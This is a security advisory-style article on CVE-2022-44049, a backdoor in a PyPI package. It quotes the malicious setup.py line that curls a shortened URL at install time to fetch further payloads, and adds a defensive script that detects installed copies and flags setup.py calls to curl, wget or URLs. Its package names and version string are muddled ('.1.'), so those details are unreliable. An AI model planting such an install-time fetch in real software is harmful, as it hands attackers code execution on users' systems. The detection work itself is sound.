CVE-2022-44049: Uncovering the d8s-python Backdoor in PyPI and How to Patch Your System
CVE-2022-44049 has recently been discovered as a high-risk vulnerability in the d8s-python library for Python as distributed on the Python Package Index (PyPI). The issue stems from a potential code-execution backdoor that was inserted by third parties. The offending package, democritus-grammars, is hiding within the affected version of d8s-htm (.1.). If you're using this version, it's critical to understand the exploit details and how to patch your system to ensure your application's security.
Exploit Details
The democritus-grammars package contains a file named "setup.py", and within this file, there is a suspicious function call to a remote server:
# Runs at install time: fetches whatever the shortened URL currently serves and returns it as a string
from subprocess import check_output
check_output(['curl', '-s', 'https://is.gd/6ZefBw'], universal_newlines=True)
As seen in this code snippet, the check_output function is used to run the 'curl' command, which requests the remote server's content at "https://is.gd/6ZefBw". Although the actual payload at that URL may change, at the time of our analysis it contained a Python script designed to download and execute additional malicious payloads.
This backdoor introduces a serious risk because it allows an attacker to execute arbitrary code on the target system, potentially granting full control over the compromised server. It's critical to assess your applications and systems for the affected d8s-python library and update them to mitigate this threat immediately.
Links to Original References
1. CVE-2022-44049 on NVD (National Vulnerability Database)
2. Official PyPI Security Advisory
Patching Your System
To safeguard your applications and systems from this backdoor vulnerability, we recommend taking the following steps:
1. Determine whether your environment is affected. To do this, check if any of your Python projects depend on the affected version of d8s-htm (.1.). You can use the pip list or pip freeze commands to list the installed packages and their versions:
pip list
or
pip freeze
2. If d8s-htm .1. is found, uninstall the package immediately using the following pip command:
pip uninstall d8s-htm
3. Keep an eye on the official PyPI Security Advisory page to stay updated on any new information regarding this vulnerability.
4. Always verify the integrity of third-party Python libraries, especially if you're using them in critical production environments. Try to choose well-maintained packages with an active community, and assess the quality of the package by reviewing its code and keeping an eye on its security track record.
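The two checks above (is the affected distribution installed, and does a package's setup.py reach out to the network during installation) can be scripted so they run the same way on every host. The following is an added example written for this article, not code from the d8s-python project or from the advisory. The affected version string in AFFECTED is a placeholder for the value the advisory names, and SAMPLE_SETUP_PY is a constructed setup.py that mirrors the shape of the snippet shown in the Exploit Details section with a placeholder URL in place of the real one.

```python
"""Defender-side checks for a backdoored PyPI package (added example).

1. find_affected(): compare installed distributions against known-bad
   (name, version) pairs, normalising names per PEP 503 so 'd8s_htm',
   'D8S-HTM' and 'd8s-htm' all match.
2. scan_setup_source(): statically inspect a setup.py with the ast module
   and report subprocess/os calls whose arguments name a network client
   (curl, wget) or contain a URL, the pattern this advisory describes.
"""
import ast
import re
from importlib import metadata

# Placeholder version for the example; take the real value from the advisory.
AFFECTED = {("d8s-htm", "0.1.0")}

PROCESS_FUNCS = {"check_output", "check_call", "call", "run", "Popen", "system", "popen"}
NET_CLIENTS = {"curl", "wget"}
URL_RE = re.compile(r"^https?://", re.IGNORECASE)

# Constructed sample: a benign git call plus the install-time fetch pattern.
SAMPLE_SETUP_PY = '''\
from subprocess import check_output
from setuptools import setup

# Benign: many projects derive a version from git at build time.
version = check_output(["git", "describe"], universal_newlines=True).strip()

# The pattern this advisory describes: a network fetch during install.
check_output(['curl', '-s', 'https://example.invalid/payload'], universal_newlines=True)

setup(name="example", version=version)
'''


def normalize(name):
    """PEP 503 normalisation: runs of '-', '_' and '.' become '-', lowercase."""
    return re.sub(r"[-_.]+", "-", name).lower()


def find_affected(installed, affected=AFFECTED):
    """installed: iterable of (name, version). Returns sorted matching pairs."""
    bad = {(normalize(n), v) for n, v in affected}
    return sorted((n, v) for n, v in installed if (normalize(n), v) in bad)


def installed_distributions():
    """(name, version) for every distribution visible to this interpreter."""
    return [(d.metadata["Name"], d.version) for d in metadata.distributions()]


def _call_name(node):
    """Last component of a call target: 'subprocess.check_output' -> 'check_output'."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return None


def scan_setup_source(source):
    """Return one finding per process-spawning call that references a network client or URL."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or _call_name(node) not in PROCESS_FUNCS:
            continue
        # Collect whitespace-separated tokens from every string literal in the call,
        # so both ['curl', '-s', url] and "curl -s url" forms are caught.
        tokens = {
            tok
            for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)
            for tok in n.value.split()
        }
        clients = sorted(tokens & NET_CLIENTS)
        urls = sorted(t for t in tokens if URL_RE.match(t))
        if clients or urls:
            findings.append({"line": node.lineno, "call": _call_name(node),
                             "clients": clients, "urls": urls})
    return findings


if __name__ == "__main__":
    for name, version in find_affected(installed_distributions()):
        print(f"AFFECTED: {name} {version} is installed; uninstall it")
    for f in scan_setup_source(SAMPLE_SETUP_PY):
        print(f"line {f['line']}: {f['call']} runs {f['clients']} with {f['urls']}")
```

Run the script inside the virtual environment you want to check; the static scan is meant to be pointed at the setup.py of a downloaded sdist before it is installed, since by the time pip has run it the fetch has already happened. The git call in the sample produces no finding, which is the false-positive case a practitioner will most often hit with a cruder grep for subprocess.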
In conclusion, CVE-2022-44049 is a severe backdoor vulnerability within d8s-python, a library distributed on PyPI. By following the steps outlined above, you can ensure your systems remain secure and protected against this threat. Remember to stay vigilant about the packages you install and evaluate their security to minimize potential risks.
Timeline
Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 17:35:00 UTC